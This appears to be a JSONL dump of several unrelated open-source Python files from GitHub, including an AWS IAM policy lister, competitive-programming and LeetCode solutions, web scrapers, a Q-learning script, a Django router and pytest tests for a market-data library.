List[str]) -> Dict[str, List[Dict[str, str]]]:\n \"\"\" Create a mapping of role names and any policies they have attached to them by \n paginating over list_attached_role_policies() calls for each role name. \n Attached policies will include policy name and ARN.\n \"\"\"\n policy_map = {}\n policy_paginator = client.get_paginator('list_role_policies')\n for name in role_names: \n if name.startswith('alpha_user'):\n role_policies = []\n for response in policy_paginator.paginate(RoleName=name):\n role_policies.extend(response.get('PolicyNames'))\n for policy in response.get('PolicyNames'):\n role_policy = client.get_role_policy(RoleName=name,PolicyName=policy)\n content = role_policy['PolicyDocument']\n for statement in content['Statement']:\n sid = \"\"\n if 'Sid' in statement:\n sid = statement['Sid']\n if isinstance(statement['Resource'],str):\n resource = statement['Resource']\n if resource.startswith('arn:aws:s3:::'):\n resource = resource[13:]\n username = name\n if name.startswith('alpha_user_'):\n username = name[11:]\n if resource!=\"*\" and sid!='list' and policy!=\"database-access\":\n print(username+\",\"+resource+\",\"+sid+\",\"+policy)\n else: \n for resource in statement['Resource']:\n if resource.startswith('arn:aws:s3:::'):\n resource = resource[13:]\n username = name\n if name.startswith('alpha_user_'):\n username = name[11:]\n if resource!=\"*\" and sid!='list' and policy!=\"database-access\":\n print(username+\",\"+resource+\",\"+sid+\",\"+policy) \n policy_map.update({name: role_policies})\n return policy_map\n\nrole_names = get_role_names()\nrole_policies = get_policies_for_roles(role_names)\n\n","repo_name":"ministryofjustice/data-platform","sub_path":"scripts/archive/analytical-platform-infrastructure/s3_assignments_comparison/list_policies.py","file_name":"list_policies.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"9612331619","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\n#from https://atcoder.jp/contests/abc137/submissions/6808061\nimport heapq\nimport sys\ninput=sys.stdin.readline\n\ndef sol():\n n,m=map(int,input().split())\n d=[]\n for i in range(n):\n 
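The listing script above leans on boto3's IAM paginators so that role sets larger than one API page are still enumerated. The general pattern, as a minimal sketch (assumes AWS credentials are already configured in the environment):

# boto3 pagination pattern for listing IAM roles.
import boto3

client = boto3.client("iam")
role_names = []
for page in client.get_paginator("list_roles").paginate():
    role_names.extend(role["RoleName"] for role in page["Roles"])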
a,b=map(int,input().split())\n if a<=m: d.append((a,b))\n d.sort(reverse=True)\n q=[]\n ans=0\n for i in range(1,m+1):\n while d and d[-1][0]<=i:\n a,b=d.pop()\n heapq.heappush(q,-b)\n if q:\n ans += -heapq.heappop(q)\n print(ans)\n \nif __name__==\"__main__\":\n sol()\n\n\"\"\"\n \ndef sol():\n n,m=map(int,input().split())\n d=[]\n ans=[0]*(m+1)\n t=0\n ans[0]=1\n y=m\n for i in range(n):\n a,b=map(int,input().split())\n if a<=m: heapq.heappush(d,(-b,-a))\n while len(d):\n bb,aa=heapq.heappop(d)\n aa*=-1\n if 0 not in ans:\n break\n if max(ans.index(0),aa)==y:\n ans[y]=1\n t+=bb\n y-=1\n else:\n for j in range(max(ans.index(0),aa),y+1):\n if ans[j]==0:\n ans[j]=1\n t+=bb\n break\n \n print(-1*t)\n \nif __name__==\"__main__\":\n sol()\n\"\"\"\n","repo_name":"clarinet758/atcoder","sub_path":"abc/b126_150/b137/d1.py","file_name":"d1.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15377278600","text":"#coding:utf-8\nfrom util.handler import BaseHandler,authenticated\nfrom model.shop import Shop\n\n'''\n基础管理模块\n'''\nclass SettingHandler(BaseHandler):\n @authenticated(\"\")\n def get(self):\n data = self.shop.simple_data\n self.json_message(200, data, \"ok\")\n\n @authenticated(\"m_setting\")\n def post(self):\n name = self.get_argument(\"name\", \"\")\n if not name:\n self.json_message(201,{}, \"请填写品牌名称\")\n\n service_phone = self.get_argument(\"service_phone\", \"\")\n announcement = self.get_argument(\"announcement\", \"\")\n\n close_desc = self.get_argument(\"close_desc\", \"\")\n status = int(self.get_argument(\"status\", 0))\n password = self.get_argument(\"password\", \"\")\n\n '''\n 积分\n '''\n reward_point_enabled = True if self.get_argument(\"reward_point_enabled\", \"\") == \"true\" else False\n initial_ratio = int(self.get_argument(\"initial_ratio\", 0))\n reward_point_limit = int(self.get_argument(\"reward_point_limit\", 0))\n exchange_ratio = int(self.get_argument(\"exchange_ratio\",0))\n\n '''\n 订单\n '''\n trade_expired_after = int(self.get_argument(\"trade_expired_after\",30))\n trade_expired_after = trade_expired_after if trade_expired_after>30 else 30\n \n auto_delivered_received = True if self.get_argument(\"auto_delivered_received\", \"\") == \"true\" else False\n\n auto_received_day = int(self.get_argument(\"auto_received_day\", 0))\n auto_delivered_received = True if self.get_argument(\"auto_delivered_received\", \"\") == \"true\" else False\n\n \n logo_image_path = self.get_argument(\"logo_image_path\", \"\")\n \n model = self.shop\n\n\n model.logo_image_path = logo_image_path\n\n model.name = name\n model.service_phone = service_phone\n model.announcement = announcement\n model.close_desc = close_desc\n model.password = password\n model.status = status\n\n\n model.reward_point_enabled = reward_point_enabled\n model.initial_ratio = initial_ratio\n model.reward_point_limit = reward_point_limit\n model.exchange_ratio = exchange_ratio\n\n model.trade_expired_after = trade_expired_after\n model.auto_delivered_received = auto_delivered_received\n model.auto_received_day = auto_received_day\n model.auto_delivered_received = auto_delivered_received\n model.save()\n\n self.json_message(200, {}, \"ok\")\n\n\nclass check_init_module(BaseHandler):\n def get(self):\n self.json_message(200, {\"init\":True})\n \nhandlers = [\n (r\"/main/api/setting\", SettingHandler),\n (r\"/main/api/check_init_module\", 
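Because CPython's `heapq` is a min-heap only, the solution above pushes `-b` and negates again on pop so that the job with the largest reward always comes out first. In isolation:

# Simulating a max-heap with heapq by negating values.
import heapq

heap = []
for reward in (30, 10, 50):
    heapq.heappush(heap, -reward)
best = -heapq.heappop(heap)  # 50, the largest reward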
check_init_module)\n]","repo_name":"hellousworld/saas","sub_path":"handler/main/api/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33319737398","text":"from argparse import Namespace\nfrom typing import Tuple, Union, overload\n\nfrom nonebot.adapters.onebot.v11 import Bot, MessageEvent, MessageSegment\nfrom nonebot.exception import ActionFailed\nfrom nonebot.params import ShellCommandArgs\nfrom nonebot.rule import ArgumentParser\nfrom PIL import Image\n\nfrom util import command, context, imutil, misc, textutil\nfrom util.user_aliases import AvatarGetter, DefaultType\n\nGENDERS = {\n \"male\": \"他\",\n \"female\": \"她\",\n \"unknown\": \"它\",\n \"animal\": \"牠\",\n \"god\": \"祂\",\n}\n\n\n@overload\ndef vertical_gradient(\n mode: str, top: int, bottom: int, width: int, height: int\n) -> Image.Image: ...\n\n@overload\ndef vertical_gradient(\n mode: str, top: Tuple[int, ...], bottom: Tuple[int, ...], width: int, height: int\n) -> Image.Image: ...\n\ndef vertical_gradient(\n mode: str, top: Union[int, Tuple[int, ...]], bottom: Union[int, Tuple[int, ...]], width: int,\n height: int\n) -> Image.Image:\n gradient = Image.new(mode, (1, height))\n px = gradient.load()\n if isinstance(bottom, tuple) and isinstance(top, tuple):\n delta = tuple(x - y for x, y in zip(bottom, top))\n for i in range(height):\n ratio = i / (height - 1)\n px[0, i] = tuple(int(ratio * x + y) for x, y in zip(delta, top))\n elif isinstance(bottom, int) and isinstance(top, int):\n delta = bottom - top\n for i in range(height):\n px[0, i] = int(delta * (i / (height - 1))) + top\n else:\n raise TypeError\n return gradient.resize((width, height))\n\n\nparser = ArgumentParser(add_help=False)\nparser.add_argument(\"target\", nargs=\"?\", default=\"\", metavar=\"目标\", help=(\n \"可使用@、QQ号、昵称、群名片或图片链接\"\n))\nparser.add_argument(\"--name\", \"-n\", metavar=\"名字\", help=(\n \"自定义名字,对于图片链接必须指定,对于QQ用户默认使用昵称\"\n))\nparser.add_argument(\"--gender\", \"-g\", choices=GENDERS, metavar=\"性别\", help=(\n \"自定义性别,对于图片链接默认为未知,对于QQ用户默认为资料性别,\"\n \"可以是“male”(他)、“female”(她)、“unknown”(它)、“animal”(牠)、“god”(祂)\"\n))\nmatcher = (\n command.CommandBuilder(\"meme_pic.ask\", \"问\", \"问问\")\n .category(\"meme_pic\")\n .shell(parser)\n .build()\n)\n@matcher.handle()\nasync def handler(bot: Bot, event: MessageEvent, args: Namespace = ShellCommandArgs()) -> None:\n async with AvatarGetter(bot, event) as g:\n target_task = g(args.target, DefaultType.TARGET)\n target, target_id = target_task.result()\n name = args.name\n gender = args.gender\n if (name is None or gender is None) and target_id is not None:\n try:\n info = await bot.get_group_member_info(\n group_id=context.get_event_context(event), user_id=target_id\n )\n name = name or info[\"card\"] or info[\"nickname\"]\n gender = gender or info[\"sex\"]\n except ActionFailed:\n info = await bot.get_stranger_info(user_id=target_id)\n name = name or info[\"nickname\"]\n gender = gender or info[\"sex\"]\n if gender is None:\n gender = \"unknown\"\n if name is None:\n await matcher.finish(\"请使用 --name 指定名字\")\n\n def make() -> MessageSegment:\n nonlocal target\n target = target.resize((640, 640), imutil.scale_resample())\n gradient_h = 150\n padding_x = 30\n padding_y = 80\n text_x = padding_x + 30\n text_y = padding_y + target.height - gradient_h\n\n im = Image.new(\n \"RGB\", (target.width + padding_x * 2, target.height + padding_y * 2), (255, 255, 255)\n )\n 
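`vertical_gradient` above fills a 1-pixel-wide column and then stretches it to the target width with `resize`, which is cheaper than writing every pixel of the full image. The grayscale case as a standalone sketch (assumes Pillow; the numbers mirror the 192-to-128 ramp used in `make`):

# A 1-pixel-wide column stretched into a full vertical gradient (Pillow).
from PIL import Image

top, bottom, width, height = 192, 128, 640, 150
col = Image.new("L", (1, height))
px = col.load()
for i in range(height):
    px[0, i] = top + int((bottom - top) * i / (height - 1))
gradient = col.resize((width, height))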
im.paste(target, (padding_x, padding_y), target)\n im.paste(\n (0, 0, 0), (padding_x, text_y), vertical_gradient(\"L\", 192, 128, target.width, gradient_h)\n )\n\n textutil.paste(im, (padding_x, padding_y // 2), f\"让{name}告诉你吧\", \"sans\", 35, anchor=\"lm\")\n text_im = textutil.paste(im, (text_x, text_y + 5), name, \"sans bold\", 25, color=(255, 165, 0))\n im.paste((255, 165, 0), (text_x - 5, text_y + 45, text_x + text_im.width + 5, text_y + 47))\n textutil.paste(\n im, (text_x, text_y + 50), f\"{name}不知道哦\", \"sans bold\", 25, color=(255, 255, 255)\n )\n textutil.paste(\n im, (padding_x, target.height + padding_y + padding_y // 2),\n f\"啊这,{GENDERS[gender]}说不知道\", \"sans\", 35, anchor=\"lm\"\n )\n\n return imutil.to_segment(im)\n\n await matcher.finish(await misc.to_thread(make))\n","repo_name":"su226/IdhagnBot","sub_path":"plugins/meme_pic/ask.py","file_name":"ask.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"521223850","text":"import gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nSEED = 1314\n\ndef q_learning(LR, DSCT, RES_IDX):\n NUM_EP = 2000\n env = gym.make('FrozenLake-v0')\n Q = np.zeros([env.observation_space.n, env.action_space.n])\n rList = []\n \n for i in range(NUM_EP):\n env.seed(SEED)\n state = env.reset()\n rAll = 0\n done = False\n\n while not done:\n # add decaying-random noise\n # standard normal random, (1 x num_of_actions) array\n action = np.argmax(Q[state, :] + np.random.randn(1, env.action_space.n) / (i + 1))\n new_state, reward, done, _ = env.step(action)\n Q[state, action] = (1-LR) * Q[state, action] + LR * (reward + DSCT * np.max(Q[new_state, :]))\n state = new_state\n rAll += reward\n rList.append(rAll)\n score = str(sum(rList)/NUM_EP)\n print(f\"Score over time: {score}\")\n print(\"Final Q-Table Values\")\n print(Q) \n plt.bar(range(len(rList)), rList, color='blue')\n plt.title(f'Learning Rate: {(LR):.3f}, Discount: {DSCT}, Score: {score}')\n plt.savefig(f'./plot_res/result_{RES_IDX}.png')\n plt.show()\n env.close()\n \nlearning_rate_list = [round(i, 3) for i in np.linspace(.8, .99, 5).tolist()]\ndis_list = [round(i, 3) for i in np.linspace(.8, .99, 5).tolist()]\n\nres_idx = 0\nfor lr in learning_rate_list:\n for dsct in dis_list:\n q_learning(lr, dsct, res_idx) \n res_idx += 1","repo_name":"Gaebobman/Reinforcement_Learning","sub_path":"Q_Learning/frozen_q_learning.py","file_name":"frozen_q_learning.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26491306991","text":"\"\"\"\n请撰写一程式,用numpy做出以下的ndarray,并输出以下资料:\n 1.红框圈起的四个角落的值\n 2.黄框圈起的值\n 3.计算每一排的总合\n\"\"\"\nimport numpy as np\n#制作题目规定之numpy\nall=np.array([])\nfor i in range(6):\n temp=np.arange(10*i,10*i+6)\n all=np.r_[all,temp]\nall=all.reshape(6,6)\n","repo_name":"PeiYun722/MyPythonExercise","sub_path":"Exercise11_29_徐珮芸.py","file_name":"Exercise11_29_徐珮芸.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11801873260","text":"from requests import get\nfrom re import search, findall, sub\n\nfrom . 
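The training loop above is the classic tabular update Q(s,a) <- (1-alpha)*Q(s,a) + alpha*(r + gamma*max Q(s',.)), with exploration supplied by Gaussian noise that decays as 1/(episode+1). One step of it with toy numbers:

# One tabular Q-learning step with decaying exploration noise (toy values).
import numpy as np

Q = np.zeros((16, 4))  # 16 states, 4 actions
alpha, gamma = 0.85, 0.99
s, r, s_next, episode = 0, 0.0, 4, 10

a = int(np.argmax(Q[s] + np.random.randn(4) / (episode + 1)))
Q[s, a] = (1 - alpha) * Q[s, a] + alpha * (r + gamma * np.max(Q[s_next]))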
import BaseSpider\n\nclass Bestwallpaper(BaseSpider):\n def __init__(self, father):\n super(Bestwallpaper, self).__init__(father, self.__class__.__name__)\n\n self.b64_data = b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAA30lEQVR4nGM8rhn5n4ECwMTAwMAgHuECFxCPcIHziWEzUsUFA2oAw8eTV/9jA8c1I7Gyny3cBuf//vT1P9wF1xJaGE5oRRG0UDLOk0E00I6BgYGB4cWi7dhdALMFJvd4ypr///////92z+n////////l+gO4y+AueL3+EMOTqWvhtjAwMDC8WLyDgYGBgUEmO5iBgYGB4WHHYgYGBgYGbg15uIsQBmyEGPDn8zcGBgYGBj4zLYZ3e8/AFX698ZDh59PXGF5igTG0FtSgSHw6dQ2FD7MdBmCGD5KENLTzAgCKP7G7JrpUYAAAAABJRU5ErkJggg=='\n self.cate = ['随机', 'Abstract', 'Animals', 'Cute', 'Creative', 'Flowers', 'Design', 'Games', 'Movies', 'Nature', 'World']\n self.true_cate = ['3D-and-Abstract', 'Animals-and-Birds', 'Cute', 'Creative-and-Graphics', 'Flowers', 'Vector-and-Design', 'Games', 'Movies', 'Nature-and-Landscape', 'Travel-and-World']\n\n def a_page_spider(self, cate):\n return ''.join(get('https://best-wallpaper.net/%s_desktop_wallpapers/page/%s' % (self.true_cate[self.cate.index(cate)-1], str(self.father.data['api'][self.name]['cate_page'][cate])), headers=self.headers, timeout=self.father.config['timeout']).text.split())\n\n def a_page_finder(self, r, c):\n new_set = findall(r'\\d*x\\d*.*?', r)\n best = [100000, 100000, 0]\n for i in resolution:\n sub_ = [int(i[1]) - self.father.resolving[0], int(i[2]) - self.father.resolving[1]]\n if 0 <= sub_[0] < best[0] and 0 <= sub_[1] < best[1]:\n best = [*sub_, i[0]]\n if best[-1] != 0:\n img = get(best[2], headers=self.headers, stream=True, timeout=self.father.config['timeout'])\n tail = search('.*?([jpnegJPENG]{3,4})$', img.headers['Content-Type']).group(1)\n return img, tail\n else:\n return False","repo_name":"yunyuyuan/PyQt5","sub_path":"wallpaper switcher/api/Bestwallpaper.py","file_name":"Bestwallpaper.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"73317200166","text":"import numpy as np\r\n\r\n\r\nclass NeuralNetwork(object):\r\n def __init__(self, learning_rate=0.1):\r\n self.weights_0_1 = np.random.normal(0.0, 2 ** -0.5, (3, 4))\r\n self.weights_1_2 = np.random.normal(0.0, 1, (1, 3))\r\n self.sigmoid_mapper = np.vectorize(self.sigmoid)\r\n self.lineal_mapper = np.vectorize(self.lineal)\r\n self.learning_rate = np.array([learning_rate])\r\n\r\n @staticmethod\r\n def sigmoid(x):\r\n return 1 / (1 + np.exp(-x))\r\n\r\n @staticmethod\r\n def lineal(x):\r\n return (x > 0) * x\r\n \r\n def predict(self, inputs):\r\n inputs_1 = np.dot(self.weights_0_1, inputs)\r\n outputs_1 = self.sigmoid_mapper(inputs_1)\r\n inputs_2 = np.dot(self.weights_1_2, outputs_1)\r\n outputs_2 = self.lineal_mapper(inputs_2)\r\n return outputs_2\r\n \r\n def train(self, inputs, expected_predict): \r\n inputs_1 = np.dot(self.weights_0_1, inputs)\r\n outputs_1 = self.sigmoid_mapper(inputs_1)\r\n\r\n inputs_2 = np.dot(self.weights_1_2, outputs_1)\r\n outputs_2 = self.sigmoid_mapper(inputs_2)\r\n\r\n actual_predict = outputs_2[0]\r\n \r\n error_layer_2 = np.array([actual_predict - expected_predict])\r\n gradient_layer_2 = actual_predict * (1 - actual_predict)\r\n weights_delta_layer_2 = error_layer_2 * gradient_layer_2\r\n self.weights_1_2 -= (np.dot(weights_delta_layer_2, outputs_1.reshape(1, len(outputs_1)))) * self.learning_rate\r\n \r\n error_layer_1 = weights_delta_layer_2 * self.weights_1_2\r\n gradient_layer_1 = outputs_1 * (1 - outputs_1)\r\n weights_delta_layer_1 = error_layer_1 * gradient_layer_1\r\n self.weights_0_1 -= 
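Note that `a_page_finder` above binds the regex matches to `new_set` but then iterates `resolution`, a name that is never defined, so the method raises NameError as written; the two names presumably should match. The selection it is aiming for — the smallest candidate resolution that still covers the display — can be sketched independently (`candidates` stands in for the (url, width, height) tuples the regex extracts):

# Pick the smallest resolution that still covers the display.
candidates = [("u1", 1920, 1080), ("u2", 2560, 1440), ("u3", 1280, 720)]
screen_w, screen_h = 1600, 900

best = None
for url, w, h in candidates:
    dw, dh = w - screen_w, h - screen_h
    if dw >= 0 and dh >= 0 and (best is None or (dw, dh) < best[:2]):
        best = (dw, dh, url)
print(best[2] if best else "no match")  # "u1"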
np.dot(inputs.reshape(len(inputs), 1), weights_delta_layer_1).T * self.learning_rate\r\n","repo_name":"alyukovnet/timemanager","sub_path":"core/neural.py","file_name":"neural.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2789509767","text":"import scrapy\n\nBASE_URL = \"https://www.alkohol.cz\"\n\n\nclass GetDrunk(scrapy.Spider):\n name = \"alkohol\"\n start_urls = [\"https://www.alkohol.cz/produkty/whisky/kategorie/\"]\n\n def format_price(self, raw_price):\n if not raw_price:\n return 0\n price = \"\"\n for el in raw_price:\n if el.isdigit(): # tmp solution\n price += el\n return int(price)\n\n def parse(self, response):\n product_box = response.css(\"div.products-box\")\n products = product_box.css(\"div.info\")\n\n for product in products:\n name = product.css(\"a.link-color::text\").get().strip()\n link = BASE_URL + product.css(\"a.link-color::attr(href)\").get()\n price_text = product.css(\"span.price::text\")\n if len(price_text) > 2: # bottle in sale\n raw_price = product.css(\"span.price::text\")[1].get().strip()\n price = self.format_price(raw_price)\n sale = True\n else:\n raw_price = product.css(\"span.price::text\").get().strip()\n price = self.format_price(raw_price)\n sale = False\n item = {\n \"name\": name,\n \"price\": price,\n \"sale\": sale,\n \"link\": link\n }\n yield item\n\n next_page = BASE_URL + response.css(\"a.noAjaxHistory.link.paging-button.paging-button-last::attr(href)\").get()\n if next_page is not None:\n yield response.follow(next_page, callback=self.parse)\n\n\n","repo_name":"petrsevcik/scraping","sub_path":"alkohol/alkohol/spiders/alkohol_cz.py","file_name":"alkohol_cz.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28717163629","text":"# (c) 2023 Michał Górny\n# Released under the terms of the MIT license\n\nimport argparse\n\nimport pytest\n\nfrom flaggie.__main__ import (split_arg_sets, split_op,\n namespace_into_token_group,\n )\nfrom flaggie.config import TokenType\n\n\n@pytest.mark.parametrize(\n \"args,expected\",\n [([\"+foo\", \"-bar\"], [([], [\"+foo\", \"-bar\"])]),\n ([\"dev-foo/bar\", \"+foo\"], [([\"dev-foo/bar\"], [\"+foo\"])]),\n ([\"dev-foo/bar\", \"baz\", \"-foo\"],\n [([\"dev-foo/bar\", \"baz\"], [\"-foo\"])]),\n ([\"+foo\", \"dev-foo/*\", \"-foo\"],\n [([], [\"+foo\"]), ([\"dev-foo/*\"], [\"-foo\"])]),\n ([\">=dev-foo/bar-11-r1\", \"+foo\"], [([\">=dev-foo/bar-11-r1\"], [\"+foo\"])]),\n ([\" 0:\n s = 1\n elif x < 0:\n s = -1\n else:\n s = 0\n r = int(str(abs(x))[::-1])\n return r*s*(r < 2**31)\n\nsolve = Solution()\nprint(solve.reverse(-23))","repo_name":"purelind/LeetCode","sub_path":"reverse_integer.py","file_name":"reverse_integer.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15948699156","text":"from urllib import request\nimport re, json\n\ndef getImage(kw):\n urlExp = \"http://image.baidu.com/search/flip?tn=baiduimage&ie=utf-8&word={0}&ct=201326592&v=flip\"\n reExp = r'\"thumbURL\":\"(http://.*?\\.jpg)\"'\n # transfer keyword to unicode\n kw_bytes = kw.encode(\"utf-8\")\n kw_unicode = str(kw_bytes).replace(r\"\\x\", \"%\").replace(\"'\", \"\") # remove ' and replace \\x with %\n kw_unicode = re.sub(r\"^b\", \"\", kw_unicode) # remove b char\n search_url = urlExp.format(kw_unicode)\n with 
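`format_price` above filters digits character by character and flags itself as a "tmp solution"; a regex does the same cleanup in one pass. A sketch on a hypothetical scraped string:

# Extracting an integer price from a scraped string via regex.
import re

raw = "1 299 Kč"
digits = re.sub(r"\D", "", raw)       # drop everything that is not a digit
price = int(digits) if digits else 0  # 1299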
request.urlopen(search_url) as rq:\n pageCode = rq.read()\n pageCode = str(pageCode, encoding=\"utf-8\", errors=\"ignore\")\n img_url = re.search(reExp, pageCode).group(1)\n return img_url\n\ndef crawlImages():\n with open(\"../static/poet2image.json\", \"w\") as fw, open(\"../static/poems.json\", \"r\") as fr:\n data = json.load(fr)\n poet2image = {}\n for key in data.keys():\n author = data[key]['author']\n print(author)\n if author not in poet2image:\n poet2image[author] = getImage(author)\n json.dump(poet2image, fw)\ncrawlImages()\n'''\ndef test():\n keyword = u\"余光中\"\n getImage(keyword)\ntest()'''","repo_name":"chibinjiang/PoetryRecommender","sub_path":"app/DataCollector/baiduImageApi.py","file_name":"baiduImageApi.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26612063691","text":"from django.urls import path, include\n\nfrom rest_framework.routers import DefaultRouter\n\n# local imports\nfrom . import views, apps\n\napp_name= apps.PotConfig.name\n\nrouter = DefaultRouter()\nrouter.register(r'pots', views.PotViewSet, basename=\"pot\")\nrouter.register(r'currencies', views.CurrencyViewSet, basename=\"currency\")\n\nurlpatterns = [\n path('', include(router.urls))\n]\n\n","repo_name":"dekunle02/Cheesy","sub_path":"backend/Cheese/pot/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72306354726","text":"class Solution:\n def checkIfCanBreak(self, s1: str, s2: str) -> bool:\n \n if not s1 or not s2:\n return False\n \n if len(s1) == 0 or len(s2) == 0:\n return 0\n \n def sorted_ascii(s):\n \n res = [0] * len(s)\n s_list = list(s)\n for idx, item in enumerate(s_list):\n res.append(ord(item))\n \n res.sort()\n return res\n \n s1_ascii = sorted_ascii(s1)\n s2_ascii = sorted_ascii(s2)\n \n def compare(s1, s2):\n for i in range(0, len(s1)):\n if s1[i] < s2[i]:\n return False\n return True\n\n \n if compare(s1_ascii, s2_ascii) or compare(s2_ascii, s1_ascii):\n return True\n \n return False\n","repo_name":"mmkhaque/LeetCodeWeeklyChallenge","sub_path":"check_if_a_string_can_break_another_string_1433.py","file_name":"check_if_a_string_can_break_another_string_1433.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20150998326","text":"\"\"\"Test market_data module.\"\"\"\n\nfrom unittest.mock import Mock, patch\n\nimport finnhub\nimport pandas as pd\nimport pytest\nimport vcr\nfrom alpaca.trading import Asset as AlpacaAsset\n\nfrom optitrader.enums import UniverseName\nfrom optitrader.market import InvestmentUniverse, MarketData\nfrom optitrader.market.base_data_provider import BaseDataProvider\nfrom optitrader.market.db.database import MarketDB\nfrom optitrader.models import AssetModel\n\nmy_vcr = vcr.VCR(\n serializer=\"json\",\n cassette_library_dir=\"tests/cassettes\",\n record_mode=\"once\",\n match_on=[\"method\", \"scheme\", \"host\", \"port\", \"path\"],\n)\n\n\ndef test_base_provider() -> None:\n \"\"\"Test BaseDataProvider.\"\"\"\n with pytest.raises(TypeError, match=\"Can't instantiate abstract class BaseDataProvider\"):\n BaseDataProvider() # type: ignore\n with pytest.raises(TypeError, match=\"Can't instantiate abstract class BaseDataProvider\"):\n super(BaseDataProvider, BaseDataProvider()).__init__() # type: ignore\n\n\ndef test_use_db() -> 
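`checkIfCanBreak` above builds explicit ASCII lists (and its `sorted_ascii` pre-fills `res` with `len(s)` zeros before appending, leaving a redundant zero prefix in each list), but the test it performs — after sorting, one string must dominate the other position-wise — works on characters directly. A compact sketch:

# s1 "breaks" s2 if one sorted string dominates the other position-wise.
def can_break(s1: str, s2: str) -> bool:
    a, b = sorted(s1), sorted(s2)
    return all(x >= y for x, y in zip(a, b)) or all(x <= y for x, y in zip(a, b))

print(can_break("abc", "xya"))  # True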
None:\n \"\"\"Test BaseDataProvider.\"\"\"\n assert isinstance(MarketData(use_db=True)._db, MarketDB)\n with pytest.raises(AttributeError, match=\"has no attribute\"):\n MarketData(use_db=False)._db # noqa: B018\n\n\n@pytest.mark.vcr()\ndef test_load_prices(\n market_data: MarketData,\n test_tickers: tuple[str, ...],\n test_start_date: pd.Timestamp,\n test_end_date: pd.Timestamp,\n) -> None:\n \"\"\"Test load_prices method.\"\"\"\n prices = market_data.load_prices(\n tickers=test_tickers,\n start_date=test_start_date,\n end_date=test_end_date,\n )\n assert isinstance(prices, pd.DataFrame)\n assert sorted(prices.columns) == sorted(test_tickers)\n\n\n@vcr.use_cassette(\"tests/data/cassettes/test_load_prices.yaml\")\ndef test_get_total_returns(\n market_data: MarketData,\n test_tickers: tuple[str, ...],\n test_start_date: pd.Timestamp,\n test_end_date: pd.Timestamp,\n) -> None:\n \"\"\"Test get_total_returns method.\"\"\"\n returns = market_data.get_total_returns(\n tickers=test_tickers,\n start_date=test_start_date,\n end_date=test_end_date,\n )\n assert isinstance(returns, pd.DataFrame)\n assert sorted(returns.columns) == sorted(test_tickers)\n\n\n@pytest.mark.vcr()\ndef test_get_assets_from_provider(\n market_data: MarketData,\n test_tickers: tuple[str, ...],\n) -> None:\n \"\"\"Test get_assets_from_provider method.\"\"\"\n assets = market_data.get_assets_from_provider(\n tickers=test_tickers,\n )\n assert isinstance(assets, list)\n assert len(assets) <= len(test_tickers)\n assert all(isinstance(a, AssetModel) for a in assets)\n\n\ndef test_get_assets_from_provider_error(\n market_data: MarketData,\n test_tickers: tuple[str, ...],\n) -> None:\n \"\"\"Test get_assets_from_provider method.\"\"\"\n response = Mock()\n response.json = Mock(return_value={\"error\": \"test\"})\n with patch(\"asyncio.run\") as mock_run, patch(\"time.sleep\") as mock_sleep:\n mock_run.side_effect = finnhub.FinnhubAPIException(response)\n with pytest.raises(finnhub.FinnhubAPIException): # noqa: PT012\n market_data.get_assets_from_provider(\n tickers=test_tickers,\n )\n mock_sleep.assert_any_call()\n\n\n@pytest.mark.vcr()\ndef test_get_market_caps(\n market_data: MarketData,\n test_tickers: tuple[str, ...],\n test_start_date: pd.Timestamp,\n test_end_date: pd.Timestamp,\n) -> None:\n \"\"\"Test get_market_caps method.\"\"\"\n mkt_caps = market_data.get_market_caps(\n tickers=test_tickers,\n start_date=test_start_date,\n end_date=test_end_date,\n )\n assert isinstance(mkt_caps, pd.DataFrame)\n assert sorted(mkt_caps.columns) == sorted(test_tickers)\n\n\n@pytest.mark.vcr()\ndef test_get_tradable_tickers(\n market_data: MarketData,\n) -> None:\n \"\"\"Test get_tradable_tickers method.\"\"\"\n tickers = market_data.get_tradable_tickers()\n assert isinstance(tickers, tuple)\n assert isinstance(tickers[0], str)\n assert all(t.isupper() for t in tickers)\n\n\n@pytest.mark.vcr()\ndef test_get_asset_by_name(\n market_data: MarketData,\n) -> None:\n \"\"\"Test get_asset_by_name method.\"\"\"\n asset = market_data.get_asset_by_name(\n name=\"Apple\",\n )\n assert isinstance(asset, AlpacaAsset)\n\n\ndef test_get_asset_from_ticker_error(\n market_data: MarketData,\n) -> None:\n \"\"\"Test get_asset_from_ticker method.\"\"\"\n asset = market_data._get_asset_from_ticker(\n ticker=\"INVALID\",\n )\n assert asset is None\n\n\n@pytest.mark.vcr()\ndef test_get_asset(\n market_data: MarketData,\n) -> None:\n \"\"\"Test 